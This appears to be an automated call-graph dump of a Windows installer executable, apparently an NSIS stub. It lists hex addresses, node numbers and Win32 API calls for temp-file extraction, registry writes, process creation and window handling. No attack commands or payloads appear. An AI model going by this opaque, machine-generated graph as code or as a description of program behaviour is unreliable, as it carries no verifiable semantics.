4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle 